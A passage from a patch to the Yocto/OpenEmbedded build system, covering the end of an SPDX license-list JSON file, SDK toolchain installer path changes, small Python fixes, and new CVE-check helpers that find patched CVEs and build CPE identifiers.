5580 "https://github.com/tcheneau/simpleRPL/blob/e645e69e38dd4e3ccfeceb2db8cba05b7c2e0cd3/LICENSE.txt",
5581 "https://github.com/tcheneau/Routing/blob/f09f46fcfe636107f22f2c98348188a65a135d98/README.md"
5582 ],
5583 "isOsiApproved": false
5584 },
5585 {
5586 "reference": "https://spdx.org/licenses/OSL-2.0.html",
5587 "isDeprecatedLicenseId": false,
5588 "detailsUrl": "https://spdx.org/licenses/OSL-2.0.json",
5589 "referenceNumber": 447,
5590 "name": "Open Software License 2.0",
5591 "licenseId": "OSL-2.0",
5592 "seeAlso": [
5593 "http://web.archive.org/web/20041020171434/http://www.rosenlaw.com/osl2.0.html"
5594 ],
5595 "isOsiApproved": true,
5596 "isFsfLibre": true
5597 },
5598 {
5599 "reference": "https://spdx.org/licenses/APSL-2.0.html",
5600 "isDeprecatedLicenseId": false,
5601 "detailsUrl": "https://spdx.org/licenses/APSL-2.0.json",
5602 "referenceNumber": 448,
5603 "name": "Apple Public Source License 2.0",
5604 "licenseId": "APSL-2.0",
5605 "seeAlso": [
5606 "http://www.opensource.apple.com/license/apsl/"
5607 ],
5608 "isOsiApproved": true,
5609 "isFsfLibre": true
5610 },
5611 {
5612 "reference": "https://spdx.org/licenses/Leptonica.html",
5613 "isDeprecatedLicenseId": false,
5614 "detailsUrl": "https://spdx.org/licenses/Leptonica.json",
5615 "referenceNumber": 449,
5616 "name": "Leptonica License",
5617 "licenseId": "Leptonica",
5618 "seeAlso": [
5619 "https://fedoraproject.org/wiki/Licensing/Leptonica"
5620 ],
5621 "isOsiApproved": false
5622 },
5623 {
5624 "reference": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.html",
5625 "isDeprecatedLicenseId": false,
5626 "detailsUrl": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.json",
5627 "referenceNumber": 450,
5628 "name": "PolyForm Small Business License 1.0.0",
5629 "licenseId": "PolyForm-Small-Business-1.0.0",
5630 "seeAlso": [
5631 "https://polyformproject.org/licenses/small-business/1.0.0"
5632 ],
5633 "isOsiApproved": false
5634 },
5635 {
5636 "reference": "https://spdx.org/licenses/LiLiQ-P-1.1.html",
5637 "isDeprecatedLicenseId": false,
5638 "detailsUrl": "https://spdx.org/licenses/LiLiQ-P-1.1.json",
5639 "referenceNumber": 451,
5640 "name": "Licence Libre du Québec – Permissive version 1.1",
5641 "licenseId": "LiLiQ-P-1.1",
5642 "seeAlso": [
5643 "https://forge.gouv.qc.ca/licence/fr/liliq-v1-1/",
5644 "http://opensource.org/licenses/LiLiQ-P-1.1"
5645 ],
5646 "isOsiApproved": true
5647 },
5648 {
5649 "reference": "https://spdx.org/licenses/NetCDF.html",
5650 "isDeprecatedLicenseId": false,
5651 "detailsUrl": "https://spdx.org/licenses/NetCDF.json",
5652 "referenceNumber": 452,
5653 "name": "NetCDF license",
5654 "licenseId": "NetCDF",
5655 "seeAlso": [
5656 "http://www.unidata.ucar.edu/software/netcdf/copyright.html"
5657 ],
5658 "isOsiApproved": false
5659 },
5660 {
5661 "reference": "https://spdx.org/licenses/OML.html",
5662 "isDeprecatedLicenseId": false,
5663 "detailsUrl": "https://spdx.org/licenses/OML.json",
5664 "referenceNumber": 453,
5665 "name": "Open Market License",
5666 "licenseId": "OML",
5667 "seeAlso": [
5668 "https://fedoraproject.org/wiki/Licensing/Open_Market_License"
5669 ],
5670 "isOsiApproved": false
5671 },
5672 {
5673 "reference": "https://spdx.org/licenses/AGPL-3.0-or-later.html",
5674 "isDeprecatedLicenseId": false,
5675 "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-or-later.json",
5676 "referenceNumber": 454,
5677 "name": "GNU Affero General Public License v3.0 or later",
5678 "licenseId": "AGPL-3.0-or-later",
5679 "seeAlso": [
5680 "https://www.gnu.org/licenses/agpl.txt",
5681 "https://opensource.org/licenses/AGPL-3.0"
5682 ],
5683 "isOsiApproved": true,
5684 "isFsfLibre": true
5685 },
5686 {
5687 "reference": "https://spdx.org/licenses/OLDAP-2.2.html",
5688 "isDeprecatedLicenseId": false,
5689 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.json",
5690 "referenceNumber": 455,
5691 "name": "Open LDAP Public License v2.2",
5692 "licenseId": "OLDAP-2.2",
5693 "seeAlso": [
5694 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d470b0c18ec67621c85881b2733057fecf4a1acc3"
5695 ],
5696 "isOsiApproved": false
5697 },
5698 {
5699 "reference": "https://spdx.org/licenses/BSD-3-Clause.html",
5700 "isDeprecatedLicenseId": false,
5701 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause.json",
5702 "referenceNumber": 456,
5703 "name": "BSD 3-Clause \"New\" or \"Revised\" License",
5704 "licenseId": "BSD-3-Clause",
5705 "seeAlso": [
5706 "https://opensource.org/licenses/BSD-3-Clause"
5707 ],
5708 "isOsiApproved": true,
5709 "isFsfLibre": true
5710 },
5711 {
5712 "reference": "https://spdx.org/licenses/WTFPL.html",
5713 "isDeprecatedLicenseId": false,
5714 "detailsUrl": "https://spdx.org/licenses/WTFPL.json",
5715 "referenceNumber": 457,
5716 "name": "Do What The F*ck You Want To Public License",
5717 "licenseId": "WTFPL",
5718 "seeAlso": [
5719 "http://www.wtfpl.net/about/",
5720 "http://sam.zoy.org/wtfpl/COPYING"
5721 ],
5722 "isOsiApproved": false,
5723 "isFsfLibre": true
5724 },
5725 {
5726 "reference": "https://spdx.org/licenses/OGL-UK-2.0.html",
5727 "isDeprecatedLicenseId": false,
5728 "detailsUrl": "https://spdx.org/licenses/OGL-UK-2.0.json",
5729 "referenceNumber": 458,
5730 "name": "Open Government Licence v2.0",
5731 "licenseId": "OGL-UK-2.0",
5732 "seeAlso": [
5733 "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/2/"
5734 ],
5735 "isOsiApproved": false
5736 },
5737 {
5738 "reference": "https://spdx.org/licenses/BSD-3-Clause-Attribution.html",
5739 "isDeprecatedLicenseId": false,
5740 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Attribution.json",
5741 "referenceNumber": 459,
5742 "name": "BSD with attribution",
5743 "licenseId": "BSD-3-Clause-Attribution",
5744 "seeAlso": [
5745 "https://fedoraproject.org/wiki/Licensing/BSD_with_Attribution"
5746 ],
5747 "isOsiApproved": false
5748 },
5749 {
5750 "reference": "https://spdx.org/licenses/RPSL-1.0.html",
5751 "isDeprecatedLicenseId": false,
5752 "detailsUrl": "https://spdx.org/licenses/RPSL-1.0.json",
5753 "referenceNumber": 460,
5754 "name": "RealNetworks Public Source License v1.0",
5755 "licenseId": "RPSL-1.0",
5756 "seeAlso": [
5757 "https://helixcommunity.org/content/rpsl",
5758 "https://opensource.org/licenses/RPSL-1.0"
5759 ],
5760 "isOsiApproved": true,
5761 "isFsfLibre": true
5762 },
5763 {
5764 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.html",
5765 "isDeprecatedLicenseId": false,
5766 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.json",
5767 "referenceNumber": 461,
5768 "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Germany",
5769 "licenseId": "CC-BY-NC-ND-3.0-DE",
5770 "seeAlso": [
5771 "https://creativecommons.org/licenses/by-nc-nd/3.0/de/legalcode"
5772 ],
5773 "isOsiApproved": false
5774 },
5775 {
5776 "reference": "https://spdx.org/licenses/EUPL-1.1.html",
5777 "isDeprecatedLicenseId": false,
5778 "detailsUrl": "https://spdx.org/licenses/EUPL-1.1.json",
5779 "referenceNumber": 462,
5780 "name": "European Union Public License 1.1",
5781 "licenseId": "EUPL-1.1",
5782 "seeAlso": [
5783 "https://joinup.ec.europa.eu/software/page/eupl/licence-eupl",
5784 "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl1.1.-licence-en_0.pdf",
5785 "https://opensource.org/licenses/EUPL-1.1"
5786 ],
5787 "isOsiApproved": true,
5788 "isFsfLibre": true
5789 },
5790 {
5791 "reference": "https://spdx.org/licenses/Sendmail-8.23.html",
5792 "isDeprecatedLicenseId": false,
5793 "detailsUrl": "https://spdx.org/licenses/Sendmail-8.23.json",
5794 "referenceNumber": 463,
5795 "name": "Sendmail License 8.23",
5796 "licenseId": "Sendmail-8.23",
5797 "seeAlso": [
5798 "https://www.proofpoint.com/sites/default/files/sendmail-license.pdf",
5799 "https://web.archive.org/web/20181003101040/https://www.proofpoint.com/sites/default/files/sendmail-license.pdf"
5800 ],
5801 "isOsiApproved": false
5802 },
5803 {
5804 "reference": "https://spdx.org/licenses/ODC-By-1.0.html",
5805 "isDeprecatedLicenseId": false,
5806 "detailsUrl": "https://spdx.org/licenses/ODC-By-1.0.json",
5807 "referenceNumber": 464,
5808 "name": "Open Data Commons Attribution License v1.0",
5809 "licenseId": "ODC-By-1.0",
5810 "seeAlso": [
5811 "https://opendatacommons.org/licenses/by/1.0/"
5812 ],
5813 "isOsiApproved": false
5814 },
5815 {
5816 "reference": "https://spdx.org/licenses/D-FSL-1.0.html",
5817 "isDeprecatedLicenseId": false,
5818 "detailsUrl": "https://spdx.org/licenses/D-FSL-1.0.json",
5819 "referenceNumber": 465,
5820 "name": "Deutsche Freie Software Lizenz",
5821 "licenseId": "D-FSL-1.0",
5822 "seeAlso": [
5823 "http://www.dipp.nrw.de/d-fsl/lizenzen/",
5824 "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/de/D-FSL-1_0_de.txt",
5825 "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/en/D-FSL-1_0_en.txt",
5826 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl",
5827 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/deutsche-freie-software-lizenz",
5828 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/german-free-software-license",
5829 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_de.txt/at_download/file",
5830 "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_en.txt/at_download/file"
5831 ],
5832 "isOsiApproved": false
5833 },
5834 {
5835 "reference": "https://spdx.org/licenses/BSD-4-Clause.html",
5836 "isDeprecatedLicenseId": false,
5837 "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause.json",
5838 "referenceNumber": 466,
5839 "name": "BSD 4-Clause \"Original\" or \"Old\" License",
5840 "licenseId": "BSD-4-Clause",
5841 "seeAlso": [
5842 "http://directory.fsf.org/wiki/License:BSD_4Clause"
5843 ],
5844 "isOsiApproved": false,
5845 "isFsfLibre": true
5846 },
5847 {
5848 "reference": "https://spdx.org/licenses/LGPL-2.1.html",
5849 "isDeprecatedLicenseId": true,
5850 "detailsUrl": "https://spdx.org/licenses/LGPL-2.1.json",
5851 "referenceNumber": 467,
5852 "name": "GNU Lesser General Public License v2.1 only",
5853 "licenseId": "LGPL-2.1",
5854 "seeAlso": [
5855 "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
5856 "https://opensource.org/licenses/LGPL-2.1"
5857 ],
5858 "isOsiApproved": true,
5859 "isFsfLibre": true
5860 },
5861 {
5862 "reference": "https://spdx.org/licenses/BSD-2-Clause-Views.html",
5863 "isDeprecatedLicenseId": false,
5864 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Views.json",
5865 "referenceNumber": 468,
5866 "name": "BSD 2-Clause with views sentence",
5867 "licenseId": "BSD-2-Clause-Views",
5868 "seeAlso": [
5869 "http://www.freebsd.org/copyright/freebsd-license.html",
5870 "https://people.freebsd.org/~ivoras/wine/patch-wine-nvidia.sh",
5871 "https://github.com/protegeproject/protege/blob/master/license.txt"
5872 ],
5873 "isOsiApproved": false
5874 },
5875 {
5876 "reference": "https://spdx.org/licenses/Artistic-1.0-Perl.html",
5877 "isDeprecatedLicenseId": false,
5878 "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-Perl.json",
5879 "referenceNumber": 469,
5880 "name": "Artistic License 1.0 (Perl)",
5881 "licenseId": "Artistic-1.0-Perl",
5882 "seeAlso": [
5883 "http://dev.perl.org/licenses/artistic.html"
5884 ],
5885 "isOsiApproved": true
5886 },
5887 {
5888 "reference": "https://spdx.org/licenses/NPOSL-3.0.html",
5889 "isDeprecatedLicenseId": false,
5890 "detailsUrl": "https://spdx.org/licenses/NPOSL-3.0.json",
5891 "referenceNumber": 470,
5892 "name": "Non-Profit Open Software License 3.0",
5893 "licenseId": "NPOSL-3.0",
5894 "seeAlso": [
5895 "https://opensource.org/licenses/NOSL3.0"
5896 ],
5897 "isOsiApproved": true
5898 },
5899 {
5900 "reference": "https://spdx.org/licenses/gSOAP-1.3b.html",
5901 "isDeprecatedLicenseId": false,
5902 "detailsUrl": "https://spdx.org/licenses/gSOAP-1.3b.json",
5903 "referenceNumber": 471,
5904 "name": "gSOAP Public License v1.3b",
5905 "licenseId": "gSOAP-1.3b",
5906 "seeAlso": [
5907 "http://www.cs.fsu.edu/~engelen/license.html"
5908 ],
5909 "isOsiApproved": false
5910 },
5911 {
5912 "reference": "https://spdx.org/licenses/Interbase-1.0.html",
5913 "isDeprecatedLicenseId": false,
5914 "detailsUrl": "https://spdx.org/licenses/Interbase-1.0.json",
5915 "referenceNumber": 472,
5916 "name": "Interbase Public License v1.0",
5917 "licenseId": "Interbase-1.0",
5918 "seeAlso": [
5919 "https://web.archive.org/web/20060319014854/http://info.borland.com/devsupport/interbase/opensource/IPL.html"
5920 ],
5921 "isOsiApproved": false
5922 },
5923 {
5924 "reference": "https://spdx.org/licenses/StandardML-NJ.html",
5925 "isDeprecatedLicenseId": true,
5926 "detailsUrl": "https://spdx.org/licenses/StandardML-NJ.json",
5927 "referenceNumber": 473,
5928 "name": "Standard ML of New Jersey License",
5929 "licenseId": "StandardML-NJ",
5930 "seeAlso": [
5931 "http://www.smlnj.org//license.html"
5932 ],
5933 "isOsiApproved": false
5934 }
5935 ],
5936 "releaseDate": "2021-08-08"
5937} \ No newline at end of file
diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh
index dd9342758b..4386b985bb 100644
--- a/meta/files/toolchain-shar-extract.sh
+++ b/meta/files/toolchain-shar-extract.sh
@@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then
56 exit 1 56 exit 1
57fi 57fi
58 58
59DEFAULT_INSTALL_DIR="@SDKPATH@" 59SDK_BUILD_PATH="@SDKPATH@"
60DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@"
60SUDO_EXEC="" 61SUDO_EXEC=""
61EXTRA_TAR_OPTIONS="" 62EXTRA_TAR_OPTIONS=""
62target_sdk_dir="" 63target_sdk_dir=""
diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh
index 5433741296..cee9adbf39 100644
--- a/meta/files/toolchain-shar-relocate.sh
+++ b/meta/files/toolchain-shar-relocate.sh
@@ -5,7 +5,7 @@ fi
5 5
6# fix dynamic loader paths in all ELF SDK binaries 6# fix dynamic loader paths in all ELF SDK binaries
7native_sysroot=$($SUDO_EXEC cat $env_setup_script |grep 'OECORE_NATIVE_SYSROOT='|cut -d'=' -f2|tr -d '"') 7native_sysroot=$($SUDO_EXEC cat $env_setup_script |grep 'OECORE_NATIVE_SYSROOT='|cut -d'=' -f2|tr -d '"')
8dl_path=$($SUDO_EXEC find $native_sysroot/lib -name "ld-linux*") 8dl_path=$($SUDO_EXEC find $native_sysroot/lib -maxdepth 1 -name "ld-linux*")
9if [ "$dl_path" = "" ] ; then 9if [ "$dl_path" = "" ] ; then
10 echo "SDK could not be set up. Relocate script unable to find ld-linux.so. Abort!" 10 echo "SDK could not be set up. Relocate script unable to find ld-linux.so. Abort!"
11 exit 1 11 exit 1
@@ -61,7 +61,7 @@ done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \
61 -e "$target_sdk_dir/post-relocate-setup" \ 61 -e "$target_sdk_dir/post-relocate-setup" \
62 -e "$target_sdk_dir/${0##*/}" | \ 62 -e "$target_sdk_dir/${0##*/}" | \
63 xargs -n100 $SUDO_EXEC sed -i \ 63 xargs -n100 $SUDO_EXEC sed -i \
64 -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \ 64 -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \
65 -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \ 65 -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \
66 -e "s: /usr/bin/perl: /usr/bin/env perl:g" 66 -e "s: /usr/bin/perl: /usr/bin/env perl:g"
67 67
@@ -72,7 +72,7 @@ fi
72 72
73# change all symlinks pointing to @SDKPATH@ 73# change all symlinks pointing to @SDKPATH@
74for l in $($SUDO_EXEC find $native_sysroot -type l); do 74for l in $($SUDO_EXEC find $native_sysroot -type l); do
75 $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:") $l 75 $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$SDK_BUILD_PATH:$target_sdk_dir:") $l
76 if [ $? -ne 0 ]; then 76 if [ $? -ne 0 ]; then
77 echo "Failed to setup symlinks. Relocate script failed. Abort!" 77 echo "Failed to setup symlinks. Relocate script failed. Abort!"
78 exit 1 78 exit 1
diff --git a/meta/lib/bblayers/create.py b/meta/lib/bblayers/create.py
index 542f31fc81..f49b48d1b4 100644
--- a/meta/lib/bblayers/create.py
+++ b/meta/lib/bblayers/create.py
@@ -71,7 +71,7 @@ class CreatePlugin(LayerPlugin):
71 def register_commands(self, sp): 71 def register_commands(self, sp):
72 parser_create_layer = self.add_command(sp, 'create-layer', self.do_create_layer, parserecipes=False) 72 parser_create_layer = self.add_command(sp, 'create-layer', self.do_create_layer, parserecipes=False)
73 parser_create_layer.add_argument('layerdir', help='Layer directory to create') 73 parser_create_layer.add_argument('layerdir', help='Layer directory to create')
74 parser_create_layer.add_argument('--priority', '-p', default=6, help='Layer directory to create') 74 parser_create_layer.add_argument('--priority', '-p', default=6, help='Priority of recipes in layer')
75 parser_create_layer.add_argument('--example-recipe-name', '-e', dest='examplerecipe', default='example', help='Filename of the example recipe') 75 parser_create_layer.add_argument('--example-recipe-name', '-e', dest='examplerecipe', default='example', help='Filename of the example recipe')
76 parser_create_layer.add_argument('--example-recipe-version', '-v', dest='version', default='0.1', help='Version number for the example recipe') 76 parser_create_layer.add_argument('--example-recipe-version', '-v', dest='version', default='0.1', help='Version number for the example recipe')
77 77
diff --git a/meta/lib/buildstats.py b/meta/lib/buildstats.py
index 8627ed3c31..c52b6c3b72 100644
--- a/meta/lib/buildstats.py
+++ b/meta/lib/buildstats.py
@@ -43,8 +43,8 @@ class SystemStats:
43 # depends on the heartbeat event, which fires less often. 43 # depends on the heartbeat event, which fires less often.
44 self.min_seconds = 1 44 self.min_seconds = 1
45 45
46 self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)') 46 self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
47 self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$') 47 self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
48 self.diskstats_ltime = None 48 self.diskstats_ltime = None
49 self.diskstats_data = None 49 self.diskstats_data = None
50 self.stat_ltimes = None 50 self.stat_ltimes = None
diff --git a/meta/lib/oe/copy_buildsystem.py b/meta/lib/oe/copy_buildsystem.py
index 31a84f5b06..d97bf9d1b9 100644
--- a/meta/lib/oe/copy_buildsystem.py
+++ b/meta/lib/oe/copy_buildsystem.py
@@ -20,7 +20,7 @@ def _smart_copy(src, dest):
20 mode = os.stat(src).st_mode 20 mode = os.stat(src).st_mode
21 if stat.S_ISDIR(mode): 21 if stat.S_ISDIR(mode):
22 bb.utils.mkdirhier(dest) 22 bb.utils.mkdirhier(dest)
23 cmd = "tar --exclude='.git' --xattrs --xattrs-include='*' -chf - -C %s -p . \ 23 cmd = "tar --exclude='.git' --exclude='__pycache__' --xattrs --xattrs-include='*' -chf - -C %s -p . \
24 | tar --xattrs --xattrs-include='*' -xf - -C %s" % (src, dest) 24 | tar --xattrs --xattrs-include='*' -xf - -C %s" % (src, dest)
25 subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT) 25 subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
26 else: 26 else:
@@ -259,7 +259,7 @@ def create_locked_sstate_cache(lockedsigs, input_sstate_cache, output_sstate_cac
259 bb.note('Generating sstate-cache...') 259 bb.note('Generating sstate-cache...')
260 260
261 nativelsbstring = d.getVar('NATIVELSBSTRING') 261 nativelsbstring = d.getVar('NATIVELSBSTRING')
262 bb.process.run("gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or '')) 262 bb.process.run("PYTHONDONTWRITEBYTECODE=1 gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
263 if fixedlsbstring and nativelsbstring != fixedlsbstring: 263 if fixedlsbstring and nativelsbstring != fixedlsbstring:
264 nativedir = output_sstate_cache + '/' + nativelsbstring 264 nativedir = output_sstate_cache + '/' + nativelsbstring
265 if os.path.isdir(nativedir): 265 if os.path.isdir(nativedir):
@@ -286,7 +286,7 @@ def check_sstate_task_list(d, targets, filteroutfile, cmdprefix='', cwd=None, lo
286 logparam = '-l %s' % logfile 286 logparam = '-l %s' % logfile
287 else: 287 else:
288 logparam = '' 288 logparam = ''
289 cmd = "%sBB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam) 289 cmd = "%sPYTHONDONTWRITEBYTECODE=1 BB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
290 env = dict(d.getVar('BB_ORIGENV', False)) 290 env = dict(d.getVar('BB_ORIGENV', False))
291 env.pop('BUILDDIR', '') 291 env.pop('BUILDDIR', '')
292 env.pop('BBPATH', '') 292 env.pop('BBPATH', '')
diff --git a/meta/lib/oe/cve_check.py b/meta/lib/oe/cve_check.py
index ce755f940a..ed4af18ced 100644
--- a/meta/lib/oe/cve_check.py
+++ b/meta/lib/oe/cve_check.py
@@ -11,8 +11,13 @@ _Version = collections.namedtuple(
11class Version(): 11class Version():
12 12
13 def __init__(self, version, suffix=None): 13 def __init__(self, version, suffix=None):
14
15 suffixes = ["alphabetical", "patch"]
16
14 if str(suffix) == "alphabetical": 17 if str(suffix) == "alphabetical":
15 version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(?P<patch_l>[a-z]))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?""" 18 version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(?P<patch_l>[a-z]))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
19 elif str(suffix) == "patch":
20 version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(p|patch)(?P<patch_l>[0-9]+))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
16 else: 21 else:
17 version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?""" 22 version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
18 regex = re.compile(r"^\s*" + version_pattern + r"\s*$", re.VERBOSE | re.IGNORECASE) 23 regex = re.compile(r"^\s*" + version_pattern + r"\s*$", re.VERBOSE | re.IGNORECASE)
@@ -23,7 +28,7 @@ class Version():
23 28
24 self._version = _Version( 29 self._version = _Version(
25 release=tuple(int(i) for i in match.group("release").replace("-",".").split(".")), 30 release=tuple(int(i) for i in match.group("release").replace("-",".").split(".")),
26 patch_l=match.group("patch_l") if str(suffix) == "alphabetical" and match.group("patch_l") else "", 31 patch_l=match.group("patch_l") if str(suffix) in suffixes and match.group("patch_l") else "",
27 pre_l=match.group("pre_l"), 32 pre_l=match.group("pre_l"),
28 pre_v=match.group("pre_v") 33 pre_v=match.group("pre_v")
29 ) 34 )
@@ -58,3 +63,150 @@ def _cmpkey(release, patch_l, pre_l, pre_v):
58 else: 63 else:
59 _pre = float(pre_v) if pre_v else float('-inf') 64 _pre = float(pre_v) if pre_v else float('-inf')
60 return _release, _patch, _pre 65 return _release, _patch, _pre
66
67def cve_check_merge_jsons(output, data):
68 """
69 Merge the data in the "package" property to the main data file
70 output
71 """
72 if output["version"] != data["version"]:
73 bb.error("Version mismatch when merging JSON outputs")
74 return
75
76 for product in output["package"]:
77 if product["name"] == data["package"][0]["name"]:
78 bb.error("Error adding the same package %s twice" % product["name"])
79 return
80
81 output["package"].append(data["package"][0])
82
83def update_symlinks(target_path, link_path):
84 """
85 Update a symbolic link link_path to point to target_path.
86 Remove the link and recreate it if exist and is different.
87 """
88 if link_path != target_path and os.path.exists(target_path):
89 if os.path.exists(os.path.realpath(link_path)):
90 os.remove(link_path)
91 os.symlink(os.path.basename(target_path), link_path)
92
93def get_patched_cves(d):
94 """
95 Get patches that solve CVEs using the "CVE: " tag.
96 """
97
98 import re
99 import oe.patch
100
101 pn = d.getVar("PN")
102 cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
103
104 # Matches the last "CVE-YYYY-ID" in the file name, also if written
105 # in lowercase. Possible to have multiple CVE IDs in a single
106 # file name, but only the last one will be detected from the file name.
107 # However, patch files contents addressing multiple CVE IDs are supported
108 # (cve_match regular expression)
109
110 cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
111
112 patched_cves = set()
113 bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
114 for url in oe.patch.src_patches(d):
115 patch_file = bb.fetch.decodeurl(url)[2]
116
117 # Check patch file name for CVE ID
118 fname_match = cve_file_name_match.search(patch_file)
119 if fname_match:
120 cve = fname_match.group(1).upper()
121 patched_cves.add(cve)
122 bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
123
124 # Remote patches won't be present and compressed patches won't be
125 # unpacked, so say we're not scanning them
126 if not os.path.isfile(patch_file):
127 bb.note("%s is remote or compressed, not scanning content" % patch_file)
128 continue
129
130 with open(patch_file, "r", encoding="utf-8") as f:
131 try:
132 patch_text = f.read()
133 except UnicodeDecodeError:
134 bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
135 " trying with iso8859-1" % patch_file)
136 f.close()
137 with open(patch_file, "r", encoding="iso8859-1") as f:
138 patch_text = f.read()
139
140 # Search for one or more "CVE: " lines
141 text_match = False
142 for match in cve_match.finditer(patch_text):
143 # Get only the CVEs without the "CVE: " tag
144 cves = patch_text[match.start()+5:match.end()]
145 for cve in cves.split():
146 bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
147 patched_cves.add(cve)
148 text_match = True
149
150 if not fname_match and not text_match:
151 bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
152
153 return patched_cves
154
155
156def get_cpe_ids(cve_product, version):
157 """
158 Get list of CPE identifiers for the given product and version
159 """
160
161 version = version.split("+git")[0]
162
163 cpe_ids = []
164 for product in cve_product.split():
165 # CVE_PRODUCT in recipes may include vendor information for CPE identifiers. If not,
166 # use wildcard for vendor.
167 if ":" in product:
168 vendor, product = product.split(":", 1)
169 else:
170 vendor = "*"
171
172 cpe_id = 'cpe:2.3:a:{}:{}:{}:*:*:*:*:*:*:*'.format(vendor, product, version)
173 cpe_ids.append(cpe_id)
174
175 return cpe_ids
176
177def convert_cve_version(version):
178 """
179 This function converts from CVE format to Yocto version format.
180 eg 8.3_p1 -> 8.3p1, 6.2_rc1 -> 6.2-rc1
181
182 Unless it is redefined using CVE_VERSION in the recipe,
183 cve_check uses the version in the name of the recipe (${PV})
184 to check vulnerabilities against a CVE in the database downloaded from NVD.
185
186 When the version has an update, i.e.
187 "p1" in OpenSSH 8.3p1,
188 "-rc1" in linux kernel 6.2-rc1,
189 the database stores the version as version_update (8.3_p1, 6.2_rc1).
190 Therefore, we must transform this version before comparing to the
191 recipe version.
192
193 In this case, the parameter of the function is 8.3_p1.
194 If the version uses the Release Candidate format, "rc",
195 this function replaces the '_' by '-'.
196 If the version uses the Update format, "p",
197 this function removes the '_' completely.
198 """
199 import re
200
201 matches = re.match('^([0-9.]+)_((p|rc)[0-9]+)$', version)
202
203 if not matches:
204 return version
205
206 version = matches.group(1)
207 update = matches.group(2)
208
209 if matches.group(3) == "rc":
210 return version + '-' + update
211
212 return version + update
diff --git a/meta/lib/oe/gpg_sign.py b/meta/lib/oe/gpg_sign.py
index 7634d7ef1d..492f096eaa 100644
